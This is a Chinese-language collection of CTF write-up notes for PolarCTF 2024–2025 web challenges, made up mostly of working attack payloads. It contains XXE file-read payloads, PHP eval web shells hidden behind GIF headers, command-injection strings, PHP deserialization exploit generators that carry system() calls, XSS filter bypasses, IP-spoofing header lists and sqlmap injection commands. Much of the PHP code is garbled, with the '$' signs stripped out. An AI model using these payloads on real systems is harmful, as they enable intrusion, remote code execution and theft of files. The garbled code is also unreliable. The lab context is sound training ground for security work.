【2024夏季个人挑战赛】
2.8.0 dom
dirsearch -u url
dom.php
/dom.php
POST:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php"
>]>
<name>&xxe;</name>
---or----
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/html/flagggg.php" >]>
<user>
<name>&xxe;</name>
</user>
upload1
100 分 1 Polar币
【2024夏季个人挑战赛】
前端验证扩展名,POST直接提交php木马
pass=system(“cat /flag.txt”);
rapyiquan
100 分 1 Polar币
【2024秋季个人挑战赛】
?c[md=l\s /
?c[md=c\at /fl\ag.php
bllbl_ser1
100 分 1 Polar币
【2024秋季个人挑战赛】
<?php
class bllbl{
public qiang;//我的强
}
class bllnbnl{
publicer='system("ls /");';
}
a = new bllbl();b = new bllnbnl();
a->qiang =b;
//b->er='system("ls /");'; //这里赋值一样的
//注意);后有分号,否则报错。payload = serialize(a);
echo "URL编码后的Payload:\n";
echo urlencode(payload) . "\n\n";
echo "原始Payload:\n";
echo $payload;
?>
output:
URL编码后的Payload:
O%3A5%3A%22bllbl%22%3A1%3A%7Bs%3A5%3A%22qiang%22%3BO%3A7%3A%22bllnbnl%22%3A1%3A%7Bs%3A2%3A%22er%22%3Bs%3A15%3A%22system%28%22ls+%2F%22%29%3B%22%3B%7D%7D
原始Payload:
O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:15:"system("ls /");";}}
?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:15:"system("ls /");";}}
?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:20:"system("cat /flag");";}}
EZ_Host
300 分 3 Polar币
【2024秋季个人挑战赛】
dirsearch -u url
/flag
or
?host=127.0.0.1;ls
?host=127.0.0.1;cat flag
传马
300 分 3 Polar币
【2024秋季个人挑战赛】
前端验证php不能传,后端传时更改扩展名木马
pass=system(“cat /flag.txt”);
笑傲上传
300 分 3 Polar币
【2024秋季个人挑战赛】
上传一个jpg非木马,然后看到输出里有include.php
/include.php?file=php://filter/convert-base64.encode/resource=/flag.txt
Deserialize
500 分 5 Polar币
【2024秋季个人挑战赛】
/hidden/
/hidden/hidden.php
<?php
class Token {
public id;
publicsecret;
public function __construct(id,secret) {
this->id =id;
this->secret =secret;
}
public function generateToken() {
return "Token for {this->id}";
}
}
class User {
publicname;
public isAdmin = false;
publictoken;
public function __construct(name,isAdmin, Token token) {this->name = name;this->isAdmin = isAdmin;this->token = token;
}
public function getInfo() {
return "{this->name} is " . (this->isAdmin ? "an admin" : "not an admin");
}
}
class Product {
publicproductName;
public price;
public function __construct(productName, price) {this->productName = productName;this->price = price;
}
public function displayProduct() {
return "Product: {this->productName}, Price: {this->price}";
}
}product=new Product("apple",1000);
token=new Token(1,"secret");token->product=product;user=new User("ZHSH",true,token);payload = serialize(user);
echo "URL编码后的Payload:\n";
echo urlencode(payload) . "\n\n";
echo "原始Payload:\n";
echo $payload;
?>
URL编码后的Payload:
O%3A4%3A%22User%22%3A3%3A%7Bs%3A4%3A%22name%22%3Bs%3A4%3A%22ZHSH%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3Bs%3A5%3A%22token%22%3BO%3A5%3A%22Token%22%3A3%3A%7Bs%3A2%3A%22id%22%3Bi%3A1%3Bs%3A6%3A%22secret%22%3Bs%3A6%3A%22secret%22%3Bs%3A7%3A%22product%22%3BO%3A7%3A%22Product%22%3A2%3A%7Bs%3A11%3A%22productName%22%3Bs%3A5%3A%22apple%22%3Bs%3A5%3A%22price%22%3Bi%3A1000%3B%7D%7D%7D
原始Payload:
O:4:"User":3:{s:4:"name";s:4:"ZHSH";s:7:"isAdmin";b:1;s:5:"token";O:5:"Token":3:{s:2:"id";i:1;s:6:"secret";s:6:"secret";s:7:"product";O:7:"Product":2:{s:11:"productName";s:5:"apple";s:5:"price";i:1000;}}}
序列一下
300 分 3 Polar币
【2024秋季个人挑战赛】
https://www.jyshare.com/compile/1/
<?php
class Polar{
public lt = "system";
publicb = "ls /";
}
a=new Polar();payload = serialize(a);
echo "URL编码后的Payload:\n";
echo urlencode(payload) . "\n\n";
echo "原始Payload:\n";
echo $payload;
?>
output:
URL编码后的Payload:
O%3A5%3A%22Polar%22%3A2%3A%7Bs%3A2%3A%22lt%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22b%22%3Bs%3A4%3A%22ls+%2F%22%3B%7D
原始Payload:
O:5:"Polar":2:{s:2:"lt";s:6:"system";s:1:"b";s:4:"ls /";}
1ncIud3
100 分 1 Polar币
【2024秋季个人挑战赛】
f14g fla9 f1ag fl4g fl49 f149
/?page=…/./…/./f1a9
一写一个不吱声
500 分 5 Polar币
【2024秋季个人挑战赛】 clesses,你也许需要知道$JAVA_HOME? Java反序列化漏洞+特殊情况下的springboot任意文件写rce
fangyifang
SnakeYaml
500 分 5 Polar币
【2024秋季个人挑战赛】 打c3p0二次反序列化回显
fangyifang
投喂
100 分 1 Polar币
【2024秋季个人挑战赛】
<?php
class User{
public username="admin";
publicis_admin=true;
}
a=new User();payload=serialize(a);
echopayload;
?>
output:
O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"is_admin";b:1;}
data=data=O:4:”User”:2:{s:8:”username”;s:5:”admin”;s:8:”is_admin”;b:1;}
ezUtil
500 分 5 Polar币
【2024冬季个人挑战赛】
fangyifang
狗黑子的RCE
100 分 1 Polar币
【2024冬季个人挑战赛】
gouheizi2=gougouheiziheizi
?gouheizi1=l\s /
?gouheizi1=c\at /fl\ag.php
坏掉的上传页
300 分 3 Polar币
【2024冬季个人挑战赛】
修改网页:
<label for="file">文件名:</label>
<input type="file" name="file"id="file"><br>
<input type="submit" name="submit" value="提交">
木马:
muma.php
GIF89a
<?php @eval($_POST['pass']);?>
穿不上。。。放一放
/config.php
/database.db
xxmmll
300 分 3 Polar币
【2024冬季个人挑战赛】
dirsearch -u url
3:25] 200 – 469B – /Dockerfile
可能不行,因为已提交,不知道flag不对否,不行用xxm方法去找新flag
Note
300 分 3 Polar币
【2024冬季个人挑战赛】
/debug.log
<?php
class Note{
private filename;
privatecontent;
}
note=new Note();reflection=new ReflectionClass(note);filenameProperty = reflection->getProperty("filename");filenameProperty->setAccessible(true);
filenameProperty->setValue(note,'flag.txt');
echo urlencode(serialize($note));
?>
/?data=O%3A4%3A%22Note%22%3A2%3A%7Bs%3A14%3A%22%00Note%00filename%22%3Bs%3A8%3A%22flag.txt%22%3Bs%3A13%3A%22%00Note%00content%22%3BN%3B%7D
赌王
300 分 3 Polar币
【2024冬季个人挑战赛】
burpsuit爆破:
spin=%E6%97%8B%E8%BD%AC
103
你可以去ed3d2c21991e3bef5e069713af9fa6ca这个目录下看看
/ed3d2c21991e3bef5e069713af9fa6ca.php
<script>alert("a")</script>
<script>confirm("a")</script>
e744f91c29ec99f0e662c9177946c627
/e744f91c29ec99f0e662c9177946c627.php
127.0.0.1;ls
只有4个1才能执行
burpsuit安装java版本fakeIp扩展
拦截,请求添加
X-Forwarded-For: 1.1.1.1
X-Forwarded: 1.1.1.1
Forwarded-For: 1.1.1.1
Forwarded: 1.1.1.1
X-Requested-With: 1.1.1.1
X-Forwarded-Proto: 1.1.1.1
X-Forwarded-Host: 1.1.1.1
X-remote-IP: 1.1.1.1
X-remote-addr: 1.1.1.1
True-Client-IP: 1.1.1.1
X-Client-IP: 1.1.1.1
Client-IP: 1.1.1.1
X-Real-IP: 1.1.1.1
Ali-CDN-Real-IP: 1.1.1.1
Cdn-Src-Ip: 1.1.1.1
Cdn-Real-Ip: 1.1.1.1
CF-Connecting-IP: 1.1.1.1
X-Cluster-Client-IP: 1.1.1.1
WL-Proxy-Client-IP: 1.1.1.1
Proxy-Client-IP: 1.1.1.1
Fastly-Client-Ip: 1.1.1.1
True-Client-Ip: 1.1.1.1
X-Originating-IP: 1.1.1.1
X-Host: 1.1.1.1
X-Custom-IP-Authorization: 1.1.1.1
发送
127.0.0.1;ls /
127.0.0.1;cat /flag
ezezser
500 分 5 Polar币
【2024冬季个人挑战赛】
参见后面找到index.php完整编码才能写payload:
<?php
class polar520{
private polarday='nukakak';
privatepolarnight='nukaka';
private polar=false;
privateclass;
public function __construct(){
this->class=new backDoor();
}
}
class backDoor {
privatekey="system('cat /flag');";
}
a=new polar520();payload = serialize(a);
echo "payload:\n";
echopayload;
echo "\nurlencode payload:\n";
echo urlencode($payload);
?>
output:
payload:
O:8:"polar520":4:{s:18:"polar520polarday";s:7:"nukakak";s:20:"polar520polarnight";s:6:"nukaka";s:15:"polar520polar";b:0;s:15:"polar520class";O:8:"backDoor":1:{s:13:"backDoorkey";s:20:"system('cat /flag');";}}
urlencode payload:
O%3A8%3A%22polar520%22%3A4%3A%7Bs%3A18%3A%22%00polar520%00polarday%22%3Bs%3A7%3A%22nukakak%22%3Bs%3A20%3A%22%00polar520%00polarnight%22%3Bs%3A6%3A%22nukaka%22%3Bs%3A15%3A%22%00polar520%00polar%22%3Bb%3A0%3Bs%3A15%3A%22%00polar520%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A13%3A%22%00backDoor%00key%22%3Bs%3A20%3A%22system%28%27cat+%2Fflag%27%29%3B%22%3B%7D%7D
/?polarday=1&polarnight=2
Cookie=polar520=payload
dirsearch -u url
发现.git
pipx run githacker --url http://e80e25c0-d461-468b-823f-b028bb8bb430.www.polarctf.com:8090/.git/ --output-folder ezezser
output:
2025-09-29 05:37:29 INFO Check it out: ezezser/92e5ceac55445b52c2d074282b9926b5
2025-09-29 05:37:29 INFO 1 / 1 were exploited successfully
┌──(root㉿kali)-[~/ezezser/92e5ceac55445b52c2d074282b9926b5]
└─# ls -tlr
total 12
-rw-r--r-- 1 root root 357 Sep 29 05:37 index.php
-rw-r--r-- 1 root root 12 Sep 29 05:37 env.php
-rw-r--r-- 1 root root 69 Sep 29 05:37 config.php
#index.php代码不全
#查看历史提交
git log -all
#采用最后一个历史提交
└─# git reset --hard 0c635537b773cdd87268e7dbdc51f985eca0b0b4
HEAD is now at 0c63553 bec54015e611cc32beb1d7674fa7873f
button
100 分 1 Polar币
【2024冬季个人挑战赛】
js代码审计
/proxy.php?file=flag
井字棋
100 分 1 Polar币
【2024冬季个人挑战赛】
js设置断点
故意输,更改一下为对方,则自己赢了,就弹出flag.
clareWinner(gameWon.player === huPlayer ? "您赢了!" : "您输了.");
原来为O,则修改为huPlayer=”X”
简单的导航站
100 分 1 Polar币
【2024冬季个人挑战赛】
php md5()不能处理数组,返回值都一样。
/audit.php?user1[]=1&user2[]=2
首页源码查看:
<div class="no-select">Admin1234!</div>
用作密码,爆破admin用户名。
P0la2adm1n
上传木马:
/uploads/
用哥斯拉查看文件,发现flag???目录下有flag.txt,但里面有很多flag,登录flag验证界面,再爆破。
任务cmd
500 分 5 Polar币
【2024冬季个人挑战赛】
dirsearch -u url
find dir /new/
url/new/
输出中有X-Power-by username is xiaoming
爆破xiaoming 密码 123123
修改url,横向越权到xiaohei
得到boss密钥 bossisxiaoheizi
dirsearch -u url
得到/login.php
爆破boss密码,flower
题目猜测为cmd参数。
/new/file/upload.php?cmd=cat%20/fla*
坦诚相见
500 分 5 Polar币
【2024冬季个人挑战赛】
┌──(root㉿kali)-[/tmp/aa]
└─# echo "<?php echo 'pass'; @eval(\$_POST['pass']); ?>"|base64
PD9waHAgZWNobyAncGFzcyc7IEBldmFsKCRfUE9TVFsncGFzcyddKTsgPz4K
rce=echo PD9waHAgZWNobyAncGFzcyc7IEBldmFsKCRfUE9TVFsncGFzcyddKTsgPz4K|base64 -d|tee 1.php
(apache:/) $ sudo cat /flag
flag{07cc6fe29d83a81846969c48cedfe607}
除了上述base64+tee生成木马,还可以删除no.php方式,绕过过滤。
来个弹窗
100 分 1 Polar币
【2025春季个人挑战赛】
"><scrscriptipt>alert(1)</scscriptript>
└─# echo "白金之星"|md5sum 5c36b203dca9ceca394697e7ff079cb6 -
linu下需要去掉回车,加-n参数!!!!,加不加引号没有问题。
┌──(root㉿kali)-[/tmp/aa]
└─# echo -n 白金之星|md5sum
dbd65172f0a14c279bc461cd0185c70a -
以上kali中md5sum的不行,
<?php
user1="白金之星";
echouser1."-->".md5($user1) . "\n\n";
?>
白金之星-->
flag{dbd65172f0a14c279bc461cd0185c70a}
椰子树晕淡水鱼
500 分 5 Polar币
【2025春季个人挑战赛】
dirsearch -u url
/admin.sh
/about.php
/uploads/
/password 下载到一个加密zip文件,包含password.txt
压缩包密码解压工具ARCHPR ,暴力破解为0606
得到密码,暴力破解登录页面
账号zhsh,密码zhsh920
得到界面: ?page=givemeaimage
Content-Disposition: form-data; name=”file”; filename=”md1.php”
Content-Type: image/png
文件上传成功: uploads/md1.php
pass=system(“ls /”);
复读机RCE
300 分 3 Polar币
【2025春季个人挑战赛】
echo "ls /"|base64
bHMgLwo=
cmd=echo bHMgLwo=|base64 -d |sh
echo "cat /flag.txt"|base64
Y2F0IC9mbGFnLnR4dAo=
cmd=echo Y2F0IC9mbGFnLnR4dAo=|base64 -d |sh
xCsMsD
300 分 3 Polar币
【2025年春季个人挑战赛】
xss:
alert(document.cookie)
urldecoe,替代关系: 空格 -> – , / -> \
cmd:
ls-\
cat、less、more等过滤了,用tac输出/flag
tac-\flag
background
100 分 1 Polar币
【2025春季个人挑战赛】
/change_background.php
POST:
d=ls&p=/
d=cat&p=/flag
coke的登陆
300 分 3 Polar币
【2025春季个人挑战赛】
cookie:
my_cookie=coke-lishuai
user: coke
pass: coke-lishuai
再给我30元
500 分 5 Polar币
【2025春季个人挑战赛】
sqlmap -u "url?id=0" -p id --level=5 --risk=3 --random-agent
发现union可用列数为2
sqlmap -u "url?id=0" -p id --level=5 --risk=3 --random-agent --union-col=2
sqlmap -u "url?id=0" -p id --level=5 --risk=3 --random-agent --union-col=2 --technique=U --dbms=mysql --sql-query="UNION SELECT 1,group_concat(schama_name) FROM information_schema.schemata" -dump
狗黑子CTF变强之路
500 分 5 Polar币
【2025春季个人挑战赛】
dirsearch -u url
find : admin.php
/index.php?page=php://filter/convert.base64-encode/resource=admin.php
// 硬编码的用户名和密码
correctUsername = "ggouheizi";correctPassword = "zigouhei";
登录后 进入 gougougou.php
look file source :
/index.php?page=php://filter/convert.base64-encode/resource=gougougou.php
<?php
gou1="8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";gou2="bgW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09";
gou3="tVXTklXR1prWVhWcCmNVZG5kMDV3ZEVsQ1MybEVjM2hOUlhweFFscHJUM1YzVldGVVMwWllVbVpNWjIxMlkyaGlhWEJaWkU1NVFVZHpTVmRXUlZGdWVHcEVVRzlJVTNSRFRVcHlaV3h0VFRscVYwRm1lSEZ1VkRKVldXcE1TMms1Y1hjeFJFWlpUa2xvWjFsU2MwUm9WVlpDZDBWWVIzWkZOMGhOT0N0UGVEMDk=";gou4=gou1{20}.gou1{41}.gou1{13}.gou1{38}.gou1{6}.gou1{9}.gou1{1}.gou1{25}.gou1{2};gou5=gou2{30}.gou2{27}.gou2{51}.gou2{0}.gou2{44}.gou2{1}.gou2{28}.gou2{30}.gou2{79}.gou2{87}.gou2{61}.gou2{61}.gou2{79};gou6=gou1{34}.gou3{36}.gou1{39}.gou3{41}.gou1{47}.gou3{0}.gou3{20}.gou3{16}.gou3{62}.gou3{62}.gou3{159}.gou3{3}.gou1{37}.gou3{231};
#gou7=Z291MnsxN30uZ291MXs4fS5nb3U0ezR9LmdvdTV7MTJ9KCRnb3U0LiRnb3U1LiRnb3U2KQ==;
# gou2{17}.gou1{8}.gou4{4}.gou5{12}(gou4.gou5.gou6)
echo gou2{17}.gou1{8}.gou4{4}.gou5{12}."\n";
// #gou8=gou2{17}.gou1{8}.gou4{4}.gou5{12}(gou4.gou5.gou6);
//echo gou8
echogou4.gou5.gou6."\n";
?>
output
eHa1
ZDkJaTAGZXZhbCgkX1BTT13bc2atZCddKTw=
eva1:
gou1="8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";gou1="8AZ1mha1vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
eva1
PD9waHAgZXZhbCgkX1BTT1RbJ2NtZCddKTs=
└─# echo PD9waHAgZXZhbCgkX1BTT1RbJ2NtZCddKTs=|base64 -d
<?php eval($_PSOT['cmd']);
/gougougou.php
http://27f3544b-7436-43cb-9b0e-e3e0a3ee99ae.www.polarctf.com:8090/index.php?page=gougougou.php
POST:
cmd=system(“cat /flag”);
bllbl_rce
300 分 3 Polar币
【2025春季个人挑战赛】
dirsearch -u url
find : /admin/admin.php
download source file:
if (strpos($command, 'bllbl') === false) {
die("no");
}
command=echo bllbl;ls /;
command=echo bllbl;cat /flag;
小白说收集很重要
500 分 5 Polar币
【2025春季个人挑战赛】
dirsearch -u url
/users.json
/flag.php
/login.php
/upload_file.php
xiaobai生成密码字典
用户用常用用户表 admin sysadmin …
爆破登录管理员账号密码
0e事件
100 分 1 Polar币
md5('QNKCDZO') == md5(240610708)
a=QNKCDZO
ez_check
500 分 5 Polar币
2025年夏季个人挑战赛
java先放一放
狗黑子的变量
500 分 5 Polar币
2025年夏季个人挑战赛
path 4个字符没有过滤。
扫描,得到 admin.php
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
l -- {PATH:5:1}
s --{PATH:2:1}
c -- {PATH:7:1}
?gou={PATH:5:1}{PATH:2:1} ../
?gou={PATH:7:1}at ../*a*
狗黑子的隐藏
300 分 3 Polar币
2025年夏季个人挑战赛